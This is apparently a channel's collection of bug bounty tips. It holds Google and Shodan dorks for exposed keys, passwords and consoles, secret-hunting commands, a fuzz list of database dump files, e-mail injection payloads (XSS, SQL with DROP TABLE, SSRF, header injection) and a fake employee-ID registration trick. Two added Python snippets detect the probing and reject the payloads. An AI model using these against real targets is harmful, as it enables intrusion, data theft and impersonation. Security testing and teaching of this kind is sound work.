#Bug_Bounty_Tips_9
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
#Bug_Bounty_Tips_10
🛡BugBounty_Tips
Here are the top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
With these dorks we are looking for open directory listings, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
#Bug_Bounty_Tips_11
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3
…
https://target.com/node/499
https://target.com/node/500
Chances are that we will find hidden pages (test, dev) which are not indexed by search engines.
☣️@InfoSecTube
#Bug_Bounty_Tips_12
🛡BugBounty_Tips
Before using this script, install these additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
# Search for testing points with gau and fff
gau target -subs | cut -d"?" -f1 | grep -E '\.js(on)?$' | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After saving the responses of the URLs that answered 200, dig through them for secrets.
# gf greps recursively from the current directory, so the saved responses under out/ are searched.
for i in $(gf -list); do [[ "$i" =~ _secrets ]] && gf "$i"; done
☣️@InfoSecTube
#Bug_Bounty_Tips_13
🛡BugBounty_Tips
✔️Spring Boot is an open-source Java framework for building stand-alone Spring applications, typically structured as microservices.
🔰Spring Boot Actuator exposes management and monitoring endpoints for such applications over HTTP (Spring Boot 1.x serves them at the web root, 2.x under /actuator/). They are typically mapped to URLs such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
org:YOUR_TARGET http.favicon.hash:116323821
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and API keys, customer data and more.
☣️@InfoSecTube
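As an added example (not part of the tip above), the same fuzz list seen from the defender's side: a Python script that parses combined-format web server access logs and flags clients that walk through several of these dump file names in a short window, plus any dump path that actually answered 200. The log lines are constructed sample data; the path set is the list above with a leading slash added to setup.sql and sqldump.sql.

```python
import re
from collections import defaultdict
from datetime import datetime

# The fuzz list above, as a set of request paths (leading slash added to setup/sqldump).
DUMP_PATHS = {"/" + n for n in (
    "back.sql backup.sql accounts.sql backups.sql clients.sql customers.sql data.sql "
    "database.sql database.sqlite users.sql db.sql db.sqlite db_backup.sql dbase.sql "
    "dbdump.sql setup.sql sqldump.sql dump.sql mysql.sql sql.sql temp.sql").split()}

# Apache/nginx combined log format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, path-without-query, status) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    return m.group(1), ts, m.group(4).split("?", 1)[0], int(m.group(5))

def find_dump_probes(lines, min_paths=3, window_seconds=60):
    """probes: {ip: sorted distinct dump paths} for clients requesting at least min_paths
    different dump names within window_seconds (404s count: the enumeration is the signal).
    exposed: dump paths that returned 200, i.e. a dump that really is reachable."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] in DUMP_PATHS:
            hits[rec[0]].append(rec[1:])          # (ts, path, status)
    probes, exposed = {}, set()
    for ip, events in hits.items():
        events.sort()
        for i, (t0, _, _) in enumerate(events):
            window = {p for t, p, _ in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(window) >= min_paths:
                probes[ip] = sorted(window)
                break
        exposed |= {p for _, p, s in events if s == 200}
    return probes, sorted(exposed)

# Constructed sample log lines (not from any real server): one client walks the list,
# one of the names actually exists, and a normal visitor fetches an unrelated page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /back.sql HTTP/1.1" 404 153',
    '203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /backup.sql HTTP/1.1" 404 153',
    '203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /db.sql?x=1 HTTP/1.1" 200 88211',
    '203.0.113.7 - - [10/Mar/2024:12:00:04 +0000] "GET /dump.sql HTTP/1.1" 404 153',
    '198.51.100.4 - - [10/Mar/2024:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.4 - - [10/Mar/2024:12:30:00 +0000] "GET /users.sql HTTP/1.1" 404 153',
]
```

Calling find_dump_probes(SAMPLE_LOG) reports the first client as an enumerator and /db.sql as exposed, while the single stray request from the second client stays below the threshold.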
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all syntactically valid e-mail addresses that can be used when pentesting e-mail handling, not only in web-based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
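As an added example, not from the original tip: a conservative e-mail address policy check in Python that rejects every construct these payloads rely on (quoted local parts, comments in parentheses, domain literals, raw control characters, percent-encoding) while still accepting ordinary addresses. The allowed character set is an assumption of this example and is deliberately stricter than RFC 5321/5322, so addresses with apostrophes or other atext punctuation are refused too.

```python
import re

# Deliberately stricter than RFC 5321/5322: plain dot-separated local part made of
# letters, digits, "_", "+" and "-", then a DNS hostname with an alphabetic TLD.
# No quoted strings, no (comments), no [domain literals], no "%" or "&".
SAFE_EMAIL_RE = re.compile(
    r"^[A-Za-z0-9_+-]+(?:\.[A-Za-z0-9_+-]+)*"
    r"@(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)

def classify(addr):
    """Return 'accept' or a short reason; checks are ordered so the reason names the riskiest construct."""
    if len(addr) > 254:
        return "too long"
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in addr):
        return "control character (raw CR/LF header injection)"
    if addr.count("@") != 1:
        return "must contain exactly one @"
    local, domain = addr.split("@")
    if '"' in local:
        return "quoted local part not accepted"
    if "(" in addr or ")" in addr:
        return "comments not accepted"
    if domain.startswith("["):
        return "domain literal (IP address) not accepted"
    if "%" in addr:
        return "percent-encoding not accepted"
    if not SAFE_EMAIL_RE.match(addr):
        return "outside allowed character set"
    return "accept"

# Inputs: the payloads quoted in the tip above, one decoded CRLF variant, and two
# ordinary addresses that the policy must still accept (constructed test data).
SAMPLES = [
    "test+(<script>alert(0)</script>)@example.com",
    "test@example(<script>alert(0)</script>).com",
    '"<script>alert(0)</script>"@example.com',
    '"<%= 7 * 7 %>"@example.com',
    "test+(${{7*7}})@example.com",
    "\"' OR 1=1 -- '\"@example.com",
    '"mail\'); DROP TABLE users;--"@example.com',
    "john.doe@[127.0.0.1]",
    '"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com',
    "john.doe\r\n@example.com",
    "john.doe@example.com",
    "first_last+tag@sub.example.co.uk",
]
```

Running classify over SAMPLES refuses every payload with a reason naming the construct, and accepts only the last two entries.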
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an employee leads to claiming employee-only private offers and ultimately getting an “Identification Card”.
Methodology:
1-Searched for Target's employee offers on Google:
inurl:"Target Name" employee offers
2-Found a website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
#Bug_Bounty_Tips_17
🛡BugBounty_Tips
Here’s an example of an exposed RocketMQ console.
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
This time we use a Shodan dork to pull up RocketMQ consoles, which often disclose fairly confidential production information:
org:target.com http.title:rocketmq-console
From the exposed RocketMQ consoles we can for example find out:
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc